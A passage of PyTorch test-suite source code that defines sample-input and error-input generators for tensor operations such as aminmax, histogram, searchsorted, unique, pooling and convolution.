each tensor to be on the same device,') yield ErrorInput(SampleInput(t, kwargs=dict(dim=3)), error_type=IndexError, error_regex='') t = torch.tensor([[1], [2], [3]]) yield ErrorInput(SampleInput(t, kwargs=dict(edge_order=1)), error_type=RuntimeError, error_regex='torch.gradient expected each dimension size to be at least') t = torch.tensor([[1, 2], [3, 4]]) yield ErrorInput(SampleInput(t, kwargs=dict(edge_order=2)), error_type=RuntimeError, error_regex='torch.gradient expected each dimension size to be at least') def error_inputs_masked_select(op_info, device, **kwargs): x = torch.rand((1,), device=device).expand((3,)) y = torch.rand((6,), device=device) mask = torch.tensor([True, False, True, True, False, False], device=device) yield ErrorInput(SampleInput(y, args=(mask,), kwargs=dict(out=x)), error_type=RuntimeError, error_regex='unsupported operation') yield ErrorInput(SampleInput(y, args=(mask,), kwargs=dict(out=y)), error_type=RuntimeError, error_regex='unsupported operation') yield ErrorInput(SampleInput(mask.clone(), args=(mask,), kwargs=dict(out=mask)), error_type=RuntimeError, error_regex='unsupported operation') def error_inputs_index_select(op_info, device, **kwargs): x = torch.rand((1, 6), device=device).expand((2, 6)) y = torch.rand((3, 6), device=device) ind = torch.tensor([0, 1], dtype=torch.int64, device=device) yield ErrorInput(SampleInput(y, args=(1, ind,), kwargs=dict(out=x)), error_type=RuntimeError, error_regex='unsupported operation') def error_inputs_logcumsumexp(op_info, device, **kwargs): dim = 3 srcs = [torch.randn(5, 2, device=device), torch.randn(0, 2, device=device)] for src in srcs: yield ErrorInput(SampleInput(src, args=(dim,)), error_type=IndexError, error_regex='Dimension out of range') def sample_inputs_take_along_dim(op_info, device, dtype, requires_grad, **kwargs): return (SampleInput(make_tensor((S, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(gather_variable((S, S), 1, S, True, device=device), 0)), # `indices` broadcast SampleInput(make_tensor((S, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(gather_variable((1, S // 2), 0, S, True, device=device), 1)), # `self` broadcast SampleInput(make_tensor((1, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(gather_variable((S, S // 2), 0, S, True, device=device), 1)), # without `dim` arg SampleInput(make_tensor((S, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(gather_variable((S, S // 2), 0, S, True, device=device), )), SampleInput(make_tensor((S, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(gather_variable((S, S // 2), 0, S, True, device=device),)), ) def error_inputs_aminmax_amax_amin(op_info, device, **kwargs): # Error Inputs for zero-dim tensors, when 'dim' arg is not provided. shape = (S, 0, S) err_msg_amax_amin = "reduction" err_msg_aminmax = "cannot compute aminmax over an empty dimension as the operation has no identity" if op_info.name in ['amax', 'amin', '_refs.amax', '_refs.amin']: yield ErrorInput(SampleInput(torch.rand(shape, device=device)), error_regex=err_msg_amax_amin) elif op_info.name in ['aminmax']: yield ErrorInput(SampleInput(torch.rand(shape, device=device)), error_regex=err_msg_aminmax) # Error Inputs for tensors with more than 64 dimension sizes = [1] * 65 err_msg1 = "only tensors with up to 64 dims are supported" yield ErrorInput(SampleInput(torch.randn(sizes, device=device), kwargs={'dim': -1}), error_regex=err_msg1) yield ErrorInput(SampleInput(torch.randn(sizes, device=device), kwargs={'dim': 64}), error_regex=err_msg1) # Error Inputs for repeated 'dim' if op_info.name in ['amax', 'amin', '_refs.amax', '_refs.amin']: dims = [(0, 0), (0, -4)] err_msg2 = "in the list of dims" x = torch.randn(S, S, S, S, device=device) for dim in dims: yield ErrorInput(SampleInput(x, kwargs={'dim': dim}), error_regex=err_msg2) # Error Input for illegal dtype input5 = torch.randn(L, L, dtype=torch.float32, device=device) max_values = torch.empty(L, dtype=torch.float32, device=device) min_values = torch.empty(L, dtype=torch.double, device=device) illegal_values = torch.empty(L, dtype=torch.int, device=device) err_msg_amax_amin2 = "Expected the dtype for input and out to match" err_msg_aminmax2 = "Expected out tensor to have dtype float, but got double instead" if op_info.name in ['amax', 'amin', '_refs.amax', '_refs.amin']: yield ErrorInput(SampleInput(input5, kwargs={'dim': 0, 'out': illegal_values}), error_regex=err_msg_amax_amin2) elif op_info.name in ['aminmax']: yield ErrorInput(SampleInput(input5, kwargs={'dim': 0, 'out': (max_values, min_values)}), error_regex=err_msg_aminmax2) # Error Inputs for functions to raise an error on specified zero'd dimension as reduction dim err_msg3 = "reduction" # FIXME: eager and ref impl throw different types of errors error_type = IndexError if 'refs' not in op_info.name else RuntimeError yield ErrorInput(SampleInput(torch.rand(shape, device=device), kwargs={'dim': 1}), error_type=error_type, error_regex=err_msg3) def sample_inputs_aminmax(op_info, device, dtype, requires_grad, **kwargs): test_cases: Tuple[tuple, dict] = ( # type: ignore[assignment] ((S, S, S), {}), ((S, S, S), {'dim': 1}), ((S, S, S), {'dim': 1, 'keepdim': True}), ((), {'dim': 0}), ((), {}), ((), {'dim': 0, 'keepdim': True}), ) samples: List[SampleInput] = [] for shape, kwargs in test_cases: samples.append(SampleInput( make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad), kwargs=kwargs)) return samples def sample_inputs_diff(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) test_cases = ( ((1,), 0, None, None), ((S,), 0, None, None), ((S, 1), 0, None, None), ((S, 1), 1, None, None), ((S, S), 0, None, None), ((S, S), 1, None, None), ((S, S), 0, (1, S), (2, S)), ((S, S), 0, None, (2, S)), ((S, S, S), 1, None, None), ((S, S, S), 2, None, None), ((S, S, S), 1, (S, 1, S), (S, 1, S)), ((S, S, S), 2, (S, S, 1), (S, S, 1)), ((S, S, S), 2, (S, S, S), (S, S, S)),) sample_inputs = [] for size, dim, size_prepend, size_append in test_cases: prepend_size = 0 if (size_prepend is None) else size_prepend[dim] append_size = 0 if (size_append is None) else size_append[dim] dim_size = size[dim] + prepend_size + append_size for n in range(dim_size): input_tensor = make_arg(size) prepend = make_arg(size_prepend) if size_prepend else None append = make_arg(size_append) if size_append else None sample_inputs.append(SampleInput(input_tensor, args=(n, dim, prepend, append,))) # add some samples with n > dim_size sample_inputs.append(SampleInput(make_arg((S, S, S)), args=(S + 1, 1,))) sample_inputs.append(SampleInput(make_arg((S, S, S)), args=(S * 3 + 2, 2, make_arg((S, S, S)), make_arg((S, S, S)),))) return sample_inputs def sample_inputs_histogram(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) sizes = ((), (S,), (S, S), (S, S, S), (S, 1, S), (S, 0, S)) sample_inputs = [] for size, bin_ct, weighted, density in product(sizes, range(1, 5), [False, True], [False, True]): input_tensor = make_arg(size) weight_tensor = make_arg(size) if weighted else None sample_inputs.append(SampleInput(input_tensor, args=(bin_ct,), kwargs=dict(weight=weight_tensor, density=density))) bins_tensor = make_arg((bin_ct + 1,)) sample_inputs.append(SampleInput(input_tensor, args=(bins_tensor,), kwargs=dict(weight=weight_tensor, density=density))) return sample_inputs def sample_inputs_histogramdd(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) sizes = ((S, S), (S, S, S), (S, 1, S), (S, 0, S)) bin_ct_patterns = ((1, 1, 1, 1, 1), (2, 3, 2, 3, 2), (3, 2, 3, 2, 3)) sample_inputs = [] for size, bin_ct_pattern, weighted, density in product(sizes, bin_ct_patterns, [False, True], [False, True]): input_tensor = make_arg(size) bin_ct = bin_ct_pattern[:size[-1]] weight_tensor = make_arg(size[:-1]) if weighted else None sample_inputs.append(SampleInput(input_tensor, args=(bin_ct,), kwargs=dict(weight=weight_tensor, density=density))) bins_tensor = [make_arg(ct + 1) for ct in bin_ct] sample_inputs.append(SampleInput(input_tensor, args=(bins_tensor,), kwargs=dict(weight=weight_tensor, density=density))) return sample_inputs def sample_inputs_histc(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) sizes = ((), (S,), (S, S), (S, S, S), (S, 1, S), (S, 0, S)) sample_inputs = [] for size, min, max in product(sizes, [0, -10], [0, 10]): # construct sample input omitting bins arg sample_inputs.append(SampleInput(make_arg(size), kwargs=dict(min=min, max=max))) # construct sample inputs with a few different bins values for bins in [1, 3, 10]: sample_inputs.append(SampleInput(make_arg(size), kwargs=dict(bins=bins, min=min, max=max))) return sample_inputs def sample_inputs_bincount(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) sample_inputs = [] for size, weighted in product((S, M), [False, True]): input_tensor = torch.randint(0, size, (size,), dtype=dtype, device=device) weight_tensor = make_arg((size,)) if weighted else None max_val = int(input_tensor.max().item()) for minlength in [0, max_val // 2, max_val, 2 * max_val]: sample_inputs.append(SampleInput(input_tensor, kwargs=dict(weights=weight_tensor, minlength=minlength))) return sample_inputs def sample_inputs_bucketize(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) sizes = ((), (S,), (S, S), (S, S, S), (S, 1, S), (S, 0, S)) sample_inputs = [] for size, out_int32, right in product(sizes, [False, True], [False, True]): input_tensor = make_arg(size) boundaries = make_arg((S,)).msort() sample_inputs.append(SampleInput(input_tensor, args=(boundaries, ), kwargs=dict(out_int32=out_int32, right=right))) return sample_inputs def sample_inputs_searchsorted(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) sizes = ((0,), (M,), (0, 0), (M, M), (0, 0, 0), (M, M, M)) inputs = [] for size, noncontiguous, out_int32, right in product(sizes, [False, True], [False, True], [False, True]): unsorted_tensor = make_arg(size, noncontiguous=noncontiguous) input_tensor = make_arg(size, noncontiguous=noncontiguous) if np.product(size) == 0: boundary_tensor = unsorted_tensor sorter = make_tensor(size, dtype=torch.int64, device=device, noncontiguous=noncontiguous) else: boundary_tensor, sorter = torch.sort(unsorted_tensor) side = "right" if right else "left" inputs.append(SampleInput(boundary_tensor, args=(input_tensor,), kwargs=dict(out_int32=out_int32, right=right))) inputs.append(SampleInput(boundary_tensor, args=(input_tensor,), kwargs=dict(out_int32=out_int32, side=side))) inputs.append( SampleInput(unsorted_tensor, args=(input_tensor,), kwargs=dict(out_int32=out_int32, right=right, sorter=sorter))) inputs.append( SampleInput(unsorted_tensor, args=(input_tensor,), kwargs=dict(out_int32=out_int32, side=side, sorter=sorter))) return inputs def sample_inputs_gradient(op_info, device, dtype, requires_grad, **kwargs): sample_inputs = [] test_cases_float = ( ((S,), None, None, 1), ((S,), 2., None, 1), ((S, S), None, None, 2), ((S, S), [2.0, 2.1], None, 1), ((S, S), [2.0, 2.1], (0, 1), 1), ((4, 4, 4), [2., 1.], (0, 1), 2), ) for size, spacing, dim, edge_order in test_cases_float: t = make_tensor(size, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) sample_inputs.append(SampleInput(t, kwargs=dict(dim=dim, spacing=spacing, edge_order=edge_order))) test_cases_tensor = ( ((3, 3, 3), ((1.1, 2.0, 3.5), (4.0, 2, 6.0)), (0, -1), 1), ((3, 3, 3), ((1.0, 3.0, 2.0), (8.0, 6.0, 1.0)), (0, 1), 2), ) for size, coordinates, dim, edge_order in test_cases_tensor: t = make_tensor(size, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) coordinates_tensor_list = [] for coords in coordinates: # `coords` will always contain floating point values and Python 3.10 does not support this # implicit conversion to an integer using `__int__` # TODO: this can be simplified after https://github.com/pytorch/pytorch/issues/69316 is fixed a = torch.tensor(coords, device=device) coordinates_tensor_list.append(a.to(dtype)) sample_inputs.append(SampleInput(t, kwargs=dict(dim=dim, spacing=coordinates_tensor_list, edge_order=edge_order))) return tuple(sample_inputs) def sample_inputs_getitem(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) test_args = [ ([1, 2],), (slice(0, 3),), ([slice(0, 3), 1],), ([[0, 2, 3], [1, 3, 3], [0, 0, 2]],), ([[0, 0, 3], [1, 1, 3], [0, 0, 2]],), ([slice(None), slice(None), [0, 3]],), ([slice(None), [0, 3], slice(None)],), ([[0, 3], slice(None), slice(None)],), ([[0, 3], [1, 2], slice(None)],), ([[0, 3], ],), ([[0, 3], slice(None)],), ([[0, 3], Ellipsis],), ([[0, 2, 3], [1, 3, 3], torch.LongTensor([0, 0, 2])],), (index_variable(2, S, device=device),), (mask_not_all_zeros((S,)),), ] for args in test_args: yield SampleInput(make_arg((S, S, S)), args=args) yield SampleInput(make_arg((S, S, S, S)), args=([slice(None), [0, 1], slice(None), [0, 1]],)) def sample_inputs_index_put(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) inputs = [] for accumulate in [False, True]: # Test with indices arg inputs.append(SampleInput( make_arg((S, S,)), args=((index_variable(2, S, device=device),), make_arg((2, S))), kwargs=dict(accumulate=accumulate))) # Test with mask arg mask = torch.zeros(S, dtype=torch.bool) if accumulate else mask_not_all_zeros((S,)) inputs.append(SampleInput( make_arg((S, S)), args=((mask, ), make_arg((S,))), kwargs=dict(accumulate=accumulate))) return inputs def sample_inputs_sort(op_info, device, dtype, requires_grad, **kwargs): def small_3d_unique(): res = torch.randperm(S * S * S, dtype=torch.int64, device=device).view(S, S, S) res = res.to(dtype).requires_grad_(requires_grad) return res def large_1d_unique(): res = torch.randperm(L * L * L, dtype=torch.int64, device=device) res = res.to(dtype).requires_grad_(requires_grad) return res samples = [] # Test case for large tensor. samples.append(SampleInput(large_1d_unique())) # Test cases for small 3d tensors. # Imitates legacy tests from test/test_torch.py dims = range(-3, 3) flag = [True, False] for dim, descending, stable in product(dims, flag, flag): # default schema without stable sort samples.append(SampleInput(small_3d_unique(), args=(dim, descending))) # schema with stable sort, no CUDA support yet if torch.device(device).type == 'cpu': samples.append( SampleInput(small_3d_unique(), kwargs=dict(dim=dim, descending=descending, stable=stable)) ) # Test cases for scalar tensor samples.append(SampleInput(torch.tensor(1, dtype=dtype, device=device, requires_grad=requires_grad))) samples.append(SampleInput(torch.tensor(1, dtype=dtype, device=device, requires_grad=requires_grad), args=(0,))) samples.append(SampleInput(torch.tensor(1, dtype=dtype, device=device, requires_grad=requires_grad), args=(0, True))) # Test cases for stable sort samples.append(SampleInput(small_3d_unique(), kwargs=dict(stable=True))) samples.append(SampleInput(small_3d_unique(), kwargs=dict(dim=0, stable=True))) samples.append(SampleInput(small_3d_unique(), kwargs=dict(dim=0, descending=True, stable=True))) return samples def sample_inputs_threshold(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) sizes = ((), (S,), (S, S), (S, S, S)) samples = [] for x_size in sizes: # threshold and values args must be numbers samples.append(SampleInput(make_arg(x_size), args=(make_arg(()).item(), make_arg(()).item()))) return samples def sample_inputs_argsort(*args, **kwargs): return [sample_input for sample_input in sample_inputs_sort(*args, **kwargs) if "stable" not in sample_input.kwargs] def sample_inputs_unique(op_info, device, dtype, requires_grad, **kwargs): sizes = ((), (S,), (S, S), (S, S, S), (S, 1, S), (S, 0, S)) sample_inputs = [] for shape, sorted, return_inverse, return_counts, dim in \ product(sizes, [False, True], [False, True], [False, True], [None, -2, -1, 0, 1, 2]): # torch.unique cannot be called if the input tensor has a zero dimension which isn't the selected dim if 0 in shape and shape.index(0) is not dim: continue # skip invalid dim args if dim is not None and (dim < -len(shape) or dim >= len(shape)): continue kwargs = dict(sorted=sorted, return_inverse=return_inverse, return_counts=return_counts, dim=dim) # construct a test case with only one distinct value input_t = torch.zeros(shape, dtype=dtype, device=device, requires_grad=requires_grad) sample_inputs.append(SampleInput(input_t, kwargs=kwargs.copy())) # construct a test case with mixed 0s and 1s input_t = make_tensor(shape, dtype=torch.bool, device=device, requires_grad=False)\ .to(dtype).requires_grad_(requires_grad) sample_inputs.append(SampleInput(input_t, kwargs=kwargs.copy())) # construct a test case with many different values input_t = make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad) sample_inputs.append(SampleInput(input_t, kwargs=kwargs.copy())) return sample_inputs def sample_inputs_unique_consecutive(*args, **kwargs): for sample_input in sample_inputs_unique(*args, **kwargs): if not sample_input.kwargs["sorted"]: sample_input.kwargs.pop("sorted") yield sample_input def sample_inputs_adaptive_avg_pool1d(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as (input shape, output size) cases = ( ((0, 8, 8), (5,)), ((3, 8, 8), 5), ((3, 8, 8), 1) ) for input_shape, output_size in cases: # Batched yield SampleInput(make_arg(input_shape), args=(output_size,)) # Unbatched yield SampleInput(make_arg(input_shape[1:]), args=(output_size,)) def sample_inputs_adaptive_avg_pool2d(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as (input shape, output size) cases = ( ((1, 8, 8, 8), (5, 7)), ((2, 8, 8, 8), (None, 7)), ((1, 8, 4, 3), (5, None)), ((1, 8, 4, 3), (None, None)), ((1, 8, 4, 3), (5)), ) for input_shape, output_size in cases: # Batched yield SampleInput(make_arg(input_shape), args=(output_size,)) # Unbatched yield SampleInput(make_arg(input_shape[1:]), args=(output_size,)) def sample_inputs_adaptive_avg_pool3d(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as (input shape, output size) cases = ( ((0, 8, 8, 8, 8), (5, 7, 4)), ((1, 8, 4, 3, 7), (None, None, None)), ((1, 8, 4, 3, 7), (1, 1, 1)), ((3, 3, 8, 8, 6), (5, 7, None)), ((1, 3, 8, 8, 6), (5, None, 2)), ((3, 3, 8, 8, 6), (None, 3, 2)), ) for input_shape, output_size in cases: # Batched yield SampleInput(make_arg(input_shape), args=(output_size,)) # Unbatched yield SampleInput(make_arg(input_shape[1:]), args=(output_size,)) def sample_inputs_adaptive_max_pool1d(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as (input shape, output size) cases = ( # ((0, 8, 8), (5,)), # 0 batch size doesn't work, cannot reshape tensor of 0 elements into shape [0, 8, -1] ((3, 4, 4), 3), ((3, 4, 4), 1) ) for shapes, return_idx in product(cases, (True, False)): # Batched yield SampleInput(make_arg(shapes[0]), args=(shapes[1], return_idx)) # Unbatched yield SampleInput(make_arg(shapes[0][1:]), args=(shapes[1], return_idx)) def sample_inputs_adaptive_max_pool2d(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as (input shape, output size) cases = ( # ((0, 8, 8, 8), (5, 7)), # 0 batch size doesn't work, cannot reshape tensor of 0 elements into shape [0, 8, -1] ((1, 4, 4, 4), (2, 3)), ((2, 4, 4, 4), (None, 3)), ((2, 4, 4, 4), (1, 1)), ((1, 4, 4, 3), (3, None)), ((1, 4, 4, 3), (None, None)), ((1, 4, 4, 3), (3)), ) for shapes, return_idx in product(cases, (True, False)): # Batched yield SampleInput(make_arg(shapes[0]), args=(shapes[1], return_idx)) # Unbatched yield SampleInput(make_arg(shapes[0][1:]), args=(shapes[1], return_idx)) def sample_inputs_adaptive_max_pool3d(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as (input shape, output size) cases = ( # ((0, 8, 8, 8, 8), (5, 7, 4)), # 0 batch size doesn't work, cannot reshape tensor of 0 elements into shape [0, 8, -1] ((1, 4, 4, 3, 5), (None, None, None)), ((1, 4, 4, 3, 5), (1, 1, 1)), ((3, 3, 4, 4, 6), (2, 3, None)), ((1, 3, 4, 4, 6), (3, None, 2)), ((3, 3, 4, 4, 6), (None, 3, 2)), ) for shapes, return_idx in product(cases, (True, False)): # Batched yield SampleInput(make_arg(shapes[0]), args=(shapes[1], return_idx)) # Unbatched yield SampleInput(make_arg(shapes[0][1:]), args=(shapes[1], return_idx)) class _TestParamsMaxPoolBase(object): def __init__(self): self.kwargs = { 'kernel_size': [3], 'stride': [2, None], 'ceil_mode': [True, False], 'padding': [0, 1], 'dilation': [1], 'return_indices': [True, False] } self.shapes = [ [1, 2, None], # batch [2], # channels [3, 6] # signal ] def _gen_shape(self): for shape in product(*self.shapes): # shape[0] is None indicates missing batch dimension if shape[0] is None: shape = shape[1:] yield shape, torch.contiguous_format # only 2d (N, C, H, W) rank 4 tensors support channels_last memory format if len(self.shapes) == 4 and len(shape) == 4: yield shape, torch.channels_last def _gen_kwargs(self): keys = self.kwargs.keys() for values in product(*self.kwargs.values()): yield dict(zip(keys, values)) def gen_input_params(self): yield from product(self._gen_shape(), self._gen_kwargs()) class _TestParamsMaxPool1d(_TestParamsMaxPoolBase): def __init__(self): super().__init__() self.kwargs['kernel_size'] += [(3,)] self.kwargs['stride'] += [(2,)] self.kwargs['padding'] += [(1,)] self.kwargs['dilation'] += [(1,)] class _TestParamsMaxPool2d(_TestParamsMaxPoolBase): def __init__(self): super().__init__() self.kwargs['kernel_size'] += [(3, 2)] self.kwargs['stride'] += [(2, 1)] self.kwargs['padding'] += [(1, 1)] self.kwargs['dilation'] += [(1, 2)] self.shapes.append([6]) class _TestParamsMaxPool3d(_TestParamsMaxPoolBase): def __init__(self): super().__init__() self.kwargs['kernel_size'] += [(3, 2, 3)] self.kwargs['stride'] += [(2, 1, 2)] self.kwargs['dilation'] += [(1, 2, 1)] self.shapes.append([6]) self.shapes.append([5]) def sample_inputs_max_pool(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=False) params_generator_type_dict = { 'nn.functional.max_pool1d': _TestParamsMaxPool1d, 'nn.functional.max_pool2d': _TestParamsMaxPool2d, 'nn.functional.max_pool3d': _TestParamsMaxPool3d, } params_generator = params_generator_type_dict[op_info.name]() for (shape, memory_format), kwargs in params_generator.gen_input_params(): arg = make_arg(shape).to(memory_format=memory_format).requires_grad_(requires_grad) yield SampleInput(arg, kwargs=kwargs) def sample_inputs_normalize(self, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, low=-1, high=1, device=device, dtype=dtype, requires_grad=requires_grad) cases: Tuple[Tuple[int], dict] = ( # type: ignore[assignment] ((2, 1, 4, 5), {'p': 1., 'dim': 2}), ((2, 3, 4, 5), {'p': 2., 'dim': 1}), ((1, 2, 4, 5), {'p': 0.5, 'dim': 0}), ((1, 3, 4, 5), {'p': -1., 'dim': 1}), ((1, 3, 4, 5), {'p': 0., 'dim': -1}), ((), {'p': 1.2, 'dim': 0}), ((2, 3, 4, 5), {}), ((2, 3, 4, 5), {'eps': 1e-4})) for input_shape, kwargs in cases: yield SampleInput(make_arg(input_shape), kwargs=kwargs) def sample_inputs_conv_transpose1d(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as shapes for input, weight, bias # and a dict of values of (stride, padding, output_padding, groups, dilation) cases: Tuple[Tuple[int], Tuple[int], Tuple[int], dict] = ( # type: ignore[assignment] ((1, 3, 4), (3, 3, 3), (3,), {'stride': (2,), 'padding': 2, 'output_padding': (1,), 'groups': 1}), ((2, 2, 4), (2, 2, 4), (4,), {'stride': (3,), 'padding': (1,), 'output_padding': (2,), 'groups': 2, 'dilation': (4,)}), ((1, 1, 4), (1, 1, 4), (1,), {'stride': 2, 'padding': 1, 'output_padding': 1, 'groups': 1, 'dilation': (2,)}), ((1, 1, 4), (1, 2, 3), None, {'stride': 2, 'padding': 1, 'output_padding': 1, 'groups': 1}), ((1, 4, 5), (4, 8, 3), None, {}) ) for input_shape, weight, bias, kwargs in cases: # Batched yield SampleInput(make_arg(input_shape), args=( make_arg(weight), make_arg(bias) if bias is not None else bias ), kwargs=kwargs) # Unbatched yield SampleInput(make_arg(input_shape[1:]), args=( make_arg(weight), make_arg(bias) if bias is not None else bias ), kwargs=kwargs) def sample_inputs_conv_transpose2d(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as shapes for input, weight, bias # and a dict of values of (stride, padding, output_padding, groups, dilation) cases: Tuple[Tuple[int], Tuple[int], Tuple[int], dict] = ( # type: ignore[assignment] ((1, 3, 4, 4), (3, 3, 3, 3), (3,), {'stride': (2, 2), 'padding': 2, 'output_padding': (1, 1), 'groups': 1}), ((2, 2, 4, 4), (2, 2, 4, 5), (4,), {'stride': (3, 2), 'padding': (1, 2), 'output_padding': (2, 3), 'groups': 2, 'dilation': (4, 4)}), ((1, 1, 4, 5), (1, 1, 4, 3), (1,), {'stride': 2, 'padding': 1, 'output_padding': 1, 'groups': 1, 'dilation': (2, 3)}), ((1, 1, 4, 3), (1, 2, 3, 4), None, {'stride': 2, 'padding': 1, 'output_padding': 1, 'groups': 1}), ((1, 4, 5, 5), (4, 8, 3, 3), None, {}) ) for input_shape, weight, bias, kwargs in cases: # Batched yield SampleInput(make_arg(input_shape), args=( make_arg(weight), make_arg(bias) if bias is not None else bias ), kwargs=kwargs) # Unbatched yield SampleInput(make_arg(input_shape[1:]), args=( make_arg(weight), make_arg(bias) if bias is not None else bias ), kwargs=kwargs) def sample_inputs_conv_transpose3d(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as shapes for input, weight, bias # and a dict of values of (stride, padding, output_padding, groups, dilation) cases: Tuple[Tuple[int], Tuple[int], Tuple[int], dict] = ( # type: ignore[assignment] ((1, 3, 4, 4, 4), (3, 3, 3, 3, 3), (3,), {'stride': (2, 2, 2), 'padding': 2, 'output_padding': (1, 1, 1), 'groups': 1}), ((2, 2, 4, 4, 4), (2, 2, 4, 5, 6), (4,), {'stride': (3, 2, 1), 'padding': (1, 2, 3), 'output_padding': (2, 3, 1), 'groups': 2, 'dilation': (4, 4, 4)}), ((1, 1, 4, 5, 2), (1, 1, 4, 3, 1), (1,), {'stride': 2, 'padding': 1, 'output_padding': 1, 'groups': 1, 'dilation': (2, 3, 2)}), ((1, 1, 4, 3, 4), (1, 2, 3, 4, 5), None, {'stride': 2, 'padding': 1, 'output_padding': 1, 'groups': 1}), ((1, 4, 5, 5, 5), (4, 8, 3, 3, 3), None, {}) ) for input_shape, weight, bias, kwargs in cases: # Batched yield SampleInput(make_arg(input_shape), args=( make_arg(weight), make_arg(bias) if bias is not None else bias ), kwargs=kwargs) # Unbatched yield SampleInput(make_arg(input_shape[1:]), args=( make_arg(weight), make_arg(bias) if bias is not None else bias ), kwargs=kwargs) def sample_inputs_conv1d(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as shapes for input, weight, bias, # and a dict of values of (stride, padding, dilation, groups) cases: Tuple = ( ((1, 3, 4), (3, 3, 3), (3,), {'stride': (2,), 'padding': 2, 'groups': 1}), ((2, 4, 8), (2, 2, 3), (2,), {'stride': 3, 'padding': 1, 'groups': 2, 'dilation': 2}), ((1, 4, 5), (1, 4, 3), None, {'stride': (2,), 'padding': 'valid'}), ((2, 2, 4), (2, 1, 4), (2,), {'stride': (1,), 'padding': 'same', 'groups': 2, 'dilation': (2,)}), # With defaults ((1, 4, 5), (3, 4, 3), None, {}), ) # TODO: (@krshrimali), add error_inputs_func once https://github.com/pytorch/pytorch/pull/67354 is merged # Should replace test_conv_modules_raise_error_on_incorrect_input_size and test_conv_shapecheck # in test/test_nn.py for input_shape, weight, bias, kwargs in cases: # Batched yield SampleInput(make_arg(input_shape), args=( make_arg(weight), make_arg(bias) if bias is not None else bias ), kwargs=kwargs) # Unbatched yield SampleInput(make_arg(input_shape[1:]), args=( make_arg(weight), make_arg(bias) if bias is not None else bias ), kwargs=kwargs) def sample_inputs_conv2d(op_info, device, dtype, requires_grad, jit_fail_sample=False, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as shapes for input, weight, bias # and a dict of values of (stride, padding, groups, dilation) cases: Tuple = ( ((1, 3, 4, 4), (3, 3, 3, 3), (3,), {'stride': (2, 2), 'padding': 2, 'groups': 1}), ((2, 4, 8, 8), (2, 2, 3, 3), (2,), {'stride': (3, 2), 'padding': (2, 1), 'groups': 2, 'dilation': (4, 4)}), ((1, 4, 5, 5), (1, 4, 2, 3), (1,), {'stride': 2, 'padding': 1, 'groups': 1, 'dilation': (2, 3)}), ((1, 4, 5, 5), (1, 4, 2, 3), (1,), {'stride': 2, 'padding': 1, 'groups': 1, 'dilation': (2, 3)}), ((1, 2, 4, 3), (4, 2, 3, 4), None, {'stride': 2, 'padding': 1, 'groups': 1}), ((1, 4, 5, 5), (1, 4, 2, 3), (1,), {'stride': 2, 'padding': "valid"}), ((1, 4, 5, 5), (1, 4, 2, 3), (1,), {'stride': 1, 'padding': "same", 'dilation': 3}), # Below are the group related samples from common_nn.py ((2, 4, 6, 6), (4, 1, 3, 3), (4,), {'groups': 4}), ((2, 4, 6, 6), (8, 1, 3, 3), (8,), {'groups': 4}), ((2, 4, 6, 6), (8, 1, 3, 3), None, {'groups': 4}), ((2, 4, 6, 6), (4, 1, 3, 3), (4,), {'groups': 4, 'stride': (3, 2)}), ((2, 4, 6, 6), (4, 1, 3, 3), (4,), {'groups': 4, 'padding': (1, 1)}), ((2, 4, 5, 5), (4, 1, 2, 2), (4,), {'groups': 4, 'dilation': (2, 2)}), ((2, 4, 6, 5), (6, 2, 3, 2), (6,), {'groups': 2}), # With defaults ((1, 4, 5, 5), (3, 